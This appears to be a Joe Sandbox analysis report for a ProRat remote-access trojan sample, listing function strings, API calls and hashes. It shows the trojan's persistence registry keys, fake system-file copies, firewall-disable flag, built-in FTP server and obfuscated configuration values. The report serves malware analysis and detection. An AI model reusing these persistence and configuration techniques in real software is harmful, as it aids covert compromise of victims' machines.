winp9.exe /stext , xrefs: 0041AE0D
Windows Logon Service , xrefs: 0041B7F7
XP_SYS_Recovery, xrefs: 004199AC
Mail, xrefs: 0041A200
Pplugin8.exe, xrefs: 0041A8AF
XP_SYS_Recovery, xrefs: 0041BC2B
Port, xrefs: 00419C96
Sifre, xrefs: 0041BFB2
PpluginCd.dll, xrefs: 0041A939
Online_List, xrefs: 0041A147
Pplugin9.dat, xrefs: 0041ABA3
Tport, xrefs: 00419ABB
Pplugin4.exe, xrefs: 0041A5FA
LanNotifie_atm=0, xrefs: 0041BAD0
Pplugin4.dat, xrefs: 0041A684
-XP, xrefs: 00419747
ICQ_UIN, xrefs: 0041BCAC
KSil_atm=0, xrefs: 0041BAA8
t, xrefs: 00419720
XP_FW_atm=0, xrefs: 0041B918
XP_FW_Disable, xrefs: 0041BBAA
ICQ_UIN2_atm=046007686 , xrefs: 0041B990
KSil, xrefs: 0041C0B4
Hata_atm= , xrefs: 0041BA80
ProRat, xrefs: 00419EA6
LanNotifie2_atm=1, xrefs: 0041941B
Pplugin8.exe /stext , xrefs: 0041AA4D
XP_FW_Disable, xrefs: 0041989D
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 0041C68D
Hata, xrefs: 0041C033
LanNotifie, xrefs: 0041C135
ProConnective, xrefs: 0041979C
Pplugin2.dll, xrefs: 0041A4E6
-XP, xrefs: 0041B408
\system32\fservice.exe, xrefs: 0041B4E5

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: DirectoryWindows$ExecVersionWindow$CreateFileFindModuleNameSleepSnapshotToolhelp32
String ID: -XP$-XP$Bulas$Bulas$C:\$Error$Explorer.exe $FW_KILL$FW_KILL$FW_KILL_atm=0$Hata$Hata$Hata$Hata_atm= $ICQ_UIN$ICQ_UIN$ICQ_UIN2$ICQ_UIN2$ICQ_UIN2_atm=046007686 $ICQ_UIN_atm=xnt/on,hq/bnl $KSil$KSil$KSil_atm=0$Kurban_Ismi$Kurban_Ismi$Kurban_Ismi_atm=whbuhl $LanNotifie$LanNotifie2_atm=1$LanNotifie_atm=0$LanNotifie_atm=0$Mail$Mail$Mail_atm=clncdsl`oAx`inn/bnl $Online_List$Online_List$Online_List_atm=iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh $Port$Port$Port_atm=4001 $Pplugin1.dll$Pplugin10xa.exe$Pplugin10xa.exe /stext $Pplugin2.dll$Pplugin3.dll$Pplugin4.dat$Pplugin4.exe$Pplugin4.exe /stext $Pplugin8.exe$Pplugin8.exe /stext $Pplugin9.dat$Pplugin9.dat$Pplugin9.dat$Pplugin9.dat$PpluginCd.dll$ProConnective$ProRat$SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}$SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\$SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings$SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\$SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\$Shell$Sifre$Sifre$Sifre_atm=032 $Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}$Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}$StubPath$Tport$Tport$V1.9:Fix-18$Windows Logon Service $Windows services $Windows services $Windows services $Windows services $XP_FW_Disable$XP_FW_Disable$XP_FW_Disable$XP_FW_atm=0$XP_SYS_Recovery$XP_SYS_Recovery$XP_SYS_atm=0$\services.exe$\system32\fservice.exe$\system32\fservice.exe$\system32\fservice.exe$\system\sservice.exe$\system\sservice.exe$\system\sservice.exe$eimsn.exe$ktd32.atm$t$winp9.exe$winp9.exe /stext $winrar.exe$};\$3\$\
API String ID: 136155298-1323724340
Opcode ID: 22e6fde50cb415fc64a11438a40bf1b8ea0238239b81afe635f6cff07be0e005
Instruction ID: ecc301c518a0eb8fde1ab81dc7758a7eb0cc0941d76fa6715f10be82dd9ab45b
Opcode Fuzzy Hash: 22e6fde50cb415fc64a11438a40bf1b8ea0238239b81afe635f6cff07be0e005
Instruction Fuzzy Hash: CC530E3491022D8BDB61EB91C845BDDB3BDFF9A308F5040EAD40866252DB789FC98F59

Uniqueness

Uniqueness Score: -1.00%

Function 0043A0DC Relevance: 61.6, APIs: 1, Strings: 34, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

@Wsocket@TCustomLineWSocket@$bctr$qqrp18Classes@TComponent.LNCOM(?,?), ref: 0043A122

Strings

REST, xrefs: 0043A34A
DELE, xrefs: 0043A310
0.0.0.0, xrefs: 0043A165
APPE, xrefs: 0043A44F
NLST, xrefs: 0043A29C
PASV, xrefs: 0043A3F8
MDTM, xrefs: 0043A4C3
PWD, xrefs: 0043A228
RETR, xrefs: 0043A1D1
SYST, xrefs: 0043A2D6
PASS, xrefs: 0043A262
ftp, xrefs: 0043A155
CDUP, xrefs: 0043A432
STRU, xrefs: 0043A46C
PORT, xrefs: 0043A197
MKD, xrefs: 0043A3A1
RNFR, xrefs: 0043A367
RNTO, xrefs: 0043A384
XMKD, xrefs: 0043A489
ABOR, xrefs: 0043A3DB
TYPE, xrefs: 0043A2B9
XRMD, xrefs: 0043A4A6
QUIT, xrefs: 0043A2F3
ServerWSocket, xrefs: 0043A12D
XPWD, xrefs: 0043A20B
RMD, xrefs: 0043A3BE
SIZE, xrefs: 0043A32D
NOOP, xrefs: 0043A415
220 ICS FTP Server ready., xrefs: 0043A175
USER, xrefs: 0043A245
CWD, xrefs: 0043A1EE
STOR, xrefs: 0043A1B4
4C, xrefs: 0043A11D
LIST, xrefs: 0043A27F

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Classes@ComponentCustomLineSocket@$bctr$qqrp18Wsocket@
String ID: 0.0.0.0$220 ICS FTP Server ready.$4C$ABOR$APPE$CDUP$CWD$DELE$LIST$MDTM$MKD$NLST$NOOP$PASS$PASV$PORT$PWD$QUIT$REST$RETR$RMD$RNFR$RNTO$SIZE$STOR$STRU$SYST$ServerWSocket$TYPE$USER$XMKD$XPWD$XRMD$ftp
API String ID: 2450905243-4251944601
Opcode ID: c79bbc08b8fdbd061cf61f2d04bbf3bd95371b97578149f03905ef820631087f
Instruction ID: 00c001958542fcaf1df7ec1444de06271efd3ac96ea589c4028e06b740f6055e
Opcode Fuzzy Hash: c79bbc08b8fdbd061cf61f2d04bbf3bd95371b97578149f03905ef820631087f
Instruction Fuzzy Hash: 0AE15979600105EFCB40DB98C688E9A77F9FF4D304F2490A5E64ADB321CB35AE06EB15

Uniqueness

Uniqueness Score: -1.00%

Function 0041C190 Relevance: 39.0, APIs: 5, Strings: 17, Instructions: 483
fileprocesswindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041C1AA
CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041C313

Part of subcall function 0040ED94: SetFileAttributesA.KERNEL32(?,00000006), ref: 0040ED9C

CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041C38E

Part of subcall function 00451220: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004512EC), ref: 00451297
Part of subcall function 00451220: RegCloseKey.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004512EC), ref: 004512AB

Part of subcall function 004512FC: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00451401), ref: 00451376

Part of subcall function 00451188: RegCloseKey.ADVAPI32(00010000,00451064,004511DF,00451064,00000001,00451136,?,?,004015B8), ref: 00451199

Part of subcall function 00451420: RegEnumKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00451540,?,00000000,00451589), ref: 004514F2
Part of subcall function 00451420: RegCloseKey.ADVAPI32(00000000,00451547,00000000,00451589), ref: 0045153A

Part of subcall function 00451188: RegFlushKey.ADVAPI32(00010000,00451064,004511DF,00451064,00000001,00451136,?,?,004015B8), ref: 004511A1

Part of subcall function 004512FC: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00451401), ref: 004513AA

Part of subcall function 0040E994: GetVersionExA.KERNEL32(00000094), ref: 0040E9D4
Part of subcall function 0040E994: GetWindowsDirectoryA.KERNEL32(?,00000104,00000094), ref: 0040E9FA

WinExec.KERNEL32(00000000,00000005), ref: 0041C7CC
MessageBoxA.USER32(00000000,00000000,Error,00000010), ref: 0041C8D9

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run, xrefs: 0041C3F8
Error, xrefs: 0041C887
Shell, xrefs: 0041C73E
StubPath, xrefs: 0041C608
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 0041C68D
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}, xrefs: 0041C50C
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\, xrefs: 0041C6CF
Hata, xrefs: 0041C7EC
};\, xrefs: 0041C817
\system32\fservice.exe, xrefs: 0041C1CA
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}, xrefs: 0041C582
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\, xrefs: 0041C43A
\system\sservice.exe, xrefs: 0041C255
Explorer.exe , xrefs: 0041C723
KSil, xrefs: 0041C925
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\, xrefs: 0041C5C4
Hata, xrefs: 0041C8A7

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CloseFile$CopyCreateDirectoryWindows$AttributesEnumExecFlushMessageOpenVersion
String ID: Error$Explorer.exe $Hata$Hata$KSil$SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}$SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\$SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\$Shell$Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}$StubPath$\system32\fservice.exe$\system\sservice.exe$};\
API String ID: 1998032731-3668057319
Opcode ID: 0a06ff67af77202042bea30e54c2db55841e5fbdd8583f71dcb0d27b1f6d9405
Instruction ID: 0acf805b992f436589d9500eb9d1c1b63959810e09db8cac1eb44ad5d3071723
Opcode Fuzzy Hash: 0a06ff67af77202042bea30e54c2db55841e5fbdd8583f71dcb0d27b1f6d9405
Instruction Fuzzy Hash: 8822E03491122D8BCB61EB51D845BDDB3BCFF9A308F5040EBD40866262DB789F898F59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C4D3 Relevance: 26.6, APIs: 2, Strings: 13, Instructions: 320
processwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00451420: RegEnumKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00451540,?,00000000,00451589), ref: 004514F2
Part of subcall function 00451420: RegCloseKey.ADVAPI32(00000000,00451547,00000000,00451589), ref: 0045153A

Part of subcall function 00451188: RegCloseKey.ADVAPI32(00010000,00451064,004511DF,00451064,00000001,00451136,?,?,004015B8), ref: 00451199

Part of subcall function 00451220: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004512EC), ref: 00451297
Part of subcall function 00451220: RegCloseKey.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004512EC), ref: 004512AB

Part of subcall function 004512FC: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00451401), ref: 00451376

Part of subcall function 00451188: RegFlushKey.ADVAPI32(00010000,00451064,004511DF,00451064,00000001,00451136,?,?,004015B8), ref: 004511A1

Part of subcall function 004512FC: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00451401), ref: 004513AA

Part of subcall function 0040E994: GetVersionExA.KERNEL32(00000094), ref: 0040E9D4
Part of subcall function 0040E994: GetWindowsDirectoryA.KERNEL32(?,00000104,00000094), ref: 0040E9FA

WinExec.KERNEL32(00000000,00000005), ref: 0041C7CC
MessageBoxA.USER32(00000000,00000000,Error,00000010), ref: 0041C8D9

Strings

Error, xrefs: 0041C887
Shell, xrefs: 0041C73E
StubPath, xrefs: 0041C608
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 0041C68D
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}, xrefs: 0041C50C
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\, xrefs: 0041C6CF
Hata, xrefs: 0041C7EC
};\, xrefs: 0041C817
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}, xrefs: 0041C582
Explorer.exe , xrefs: 0041C723
KSil, xrefs: 0041C925
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\, xrefs: 0041C5C4
Hata, xrefs: 0041C8A7

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Close$Create$DirectoryEnumExecFlushMessageOpenVersionWindows
String ID: Error$Explorer.exe $Hata$Hata$KSil$SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}$SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\$Shell$Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}$StubPath$};\
API String ID: 2939403913-2872533001
Opcode ID: 8a0c208332ee1b9cba5529fac466422100ee0818afe20f91a1bd3684bad4a0bf
Instruction ID: f78bbf6886d26e991a6a94c7456e77c1d873ceced201ff5625bd94e9f2cbe395
Opcode Fuzzy Hash: 8a0c208332ee1b9cba5529fac466422100ee0818afe20f91a1bd3684bad4a0bf
Instruction Fuzzy Hash: 58E10F3491122D8BCB61EB91D845BDDB3B9FF8A308F5040EB940866213DB789FC58F59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C550 Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 301
processwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00451188: RegCloseKey.ADVAPI32(00010000,00451064,004511DF,00451064,00000001,00451136,?,?,004015B8), ref: 00451199

Part of subcall function 00451220: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004512EC), ref: 00451297
Part of subcall function 00451220: RegCloseKey.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004512EC), ref: 004512AB

Part of subcall function 004512FC: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00451401), ref: 00451376

Part of subcall function 00451188: RegFlushKey.ADVAPI32(00010000,00451064,004511DF,00451064,00000001,00451136,?,?,004015B8), ref: 004511A1

Part of subcall function 004512FC: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00451401), ref: 004513AA

Part of subcall function 0040E994: GetVersionExA.KERNEL32(00000094), ref: 0040E9D4
Part of subcall function 0040E994: GetWindowsDirectoryA.KERNEL32(?,00000104,00000094), ref: 0040E9FA

WinExec.KERNEL32(00000000,00000005), ref: 0041C7CC
MessageBoxA.USER32(00000000,00000000,Error,00000010), ref: 0041C8D9

Strings

};\, xrefs: 0041C817
Error, xrefs: 0041C887
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}, xrefs: 0041C582
Shell, xrefs: 0041C73E
Explorer.exe , xrefs: 0041C723
StubPath, xrefs: 0041C608
KSil, xrefs: 0041C925
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\, xrefs: 0041C5C4
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 0041C68D
Hata, xrefs: 0041C8A7
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\, xrefs: 0041C6CF
Hata, xrefs: 0041C7EC

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CloseCreate$DirectoryExecFlushMessageOpenVersionWindows
String ID: Error$Explorer.exe $Hata$Hata$KSil$SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}$SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\$Shell$StubPath$};\
API String ID: 2294683755-1367719264
Opcode ID: 66bdf3e2237c3cd6657dc2bd0277d9c2bac07e756a3d2a5844cc9ce95db99883
Instruction ID: fc8c6c37357ee37908c638bfa3ed808aa6974c682e8f7217bc2095438c5c87fe
Opcode Fuzzy Hash: 66bdf3e2237c3cd6657dc2bd0277d9c2bac07e756a3d2a5844cc9ce95db99883
Instruction Fuzzy Hash: 6BD1FF3491122D8BCB61AB91D845BDDB3B9FF8A308F5040EB940866253DB789FC98F59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C65D Relevance: 19.5, APIs: 2, Strings: 9, Instructions: 254
processwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00451220: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004512EC), ref: 00451297
Part of subcall function 00451220: RegCloseKey.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004512EC), ref: 004512AB

Part of subcall function 004512FC: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00451401), ref: 00451376

Part of subcall function 00451188: RegCloseKey.ADVAPI32(00010000,00451064,004511DF,00451064,00000001,00451136,?,?,004015B8), ref: 00451199

Part of subcall function 0040E994: GetVersionExA.KERNEL32(00000094), ref: 0040E9D4
Part of subcall function 0040E994: GetWindowsDirectoryA.KERNEL32(?,00000104,00000094), ref: 0040E9FA

WinExec.KERNEL32(00000000,00000005), ref: 0041C7CC
MessageBoxA.USER32(00000000,00000000,Error,00000010), ref: 0041C8D9

Strings

};\, xrefs: 0041C817
Error, xrefs: 0041C887
Shell, xrefs: 0041C73E
Explorer.exe , xrefs: 0041C723
KSil, xrefs: 0041C925
Hata, xrefs: 0041C8A7
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 0041C68D
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\, xrefs: 0041C6CF
Hata, xrefs: 0041C7EC

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Close$CreateDirectoryExecMessageOpenVersionWindows
String ID: Error$Explorer.exe $Hata$Hata$KSil$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\$Shell$};\
API String ID: 296980533-891980740
Opcode ID: cfb39acc63ba9a82c64c11f03755fb31194697716387662760ed6f27f9533428
Instruction ID: b707ddd943acbeb5fe6d6dc6ad9f94799bc58ec7ffb94f7173bef2fb7ce0675e
Opcode Fuzzy Hash: cfb39acc63ba9a82c64c11f03755fb31194697716387662760ed6f27f9533428
Instruction Fuzzy Hash: 3DC1EF3491022D8BCB61AB91D846BDDF3BDFF9A308F5040EB940866253DB785F898F59

Uniqueness

Uniqueness Score: -1.00%

Function 0041B343 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 236
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000104,?,00000104,00000000,000000FF,?,?,?,?,00000001), ref: 0041B35D
CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041B49D

Part of subcall function 0040ED94: SetFileAttributesA.KERNEL32(?,00000006), ref: 0040ED9C

CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041B62E
CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041B6A9

Part of subcall function 0040EC74: FindWindowA.USER32(00000000,00000000), ref: 0040ECA2
Part of subcall function 0040EC74: GetWindow.USER32(?,00000002), ref: 0040ECB4
Part of subcall function 0040EC74: GetWindowTextA.USER32(?,?,000001F4), ref: 0040ECD5

WinExec.KERNEL32(00000000,00000005), ref: 0041B6F3

Strings

\services.exe, xrefs: 0041B37D
\system\sservice.exe, xrefs: 0041B570
-XP, xrefs: 0041B408
Windows services , xrefs: 0041B6D6
\system32\fservice.exe, xrefs: 0041B4E5

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: File$CopyWindow$AttributesDirectoryExecFindTextWindows
String ID: -XP$Windows services $\services.exe$\system32\fservice.exe$\system\sservice.exe
API String ID: 588248907-565446837
Opcode ID: b6c1a878d1f43ffe455e55adda6927173a084677f0f8f34638b5e69a9f3a5f01
Instruction ID: 6fbbb513073af802f4af7d6fb109058643818fef23bdc48062eb26178877017c
Opcode Fuzzy Hash: b6c1a878d1f43ffe455e55adda6927173a084677f0f8f34638b5e69a9f3a5f01
Instruction Fuzzy Hash: D2A1FF3495022D8BDB61EB51DC42BDDB3BCEF9A308F5040EBA40862152EB795FC98F59

Uniqueness

Uniqueness Score: -1.00%

Function 0046D3A4 Relevance: 13.6, APIs: 9, Instructions: 130
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

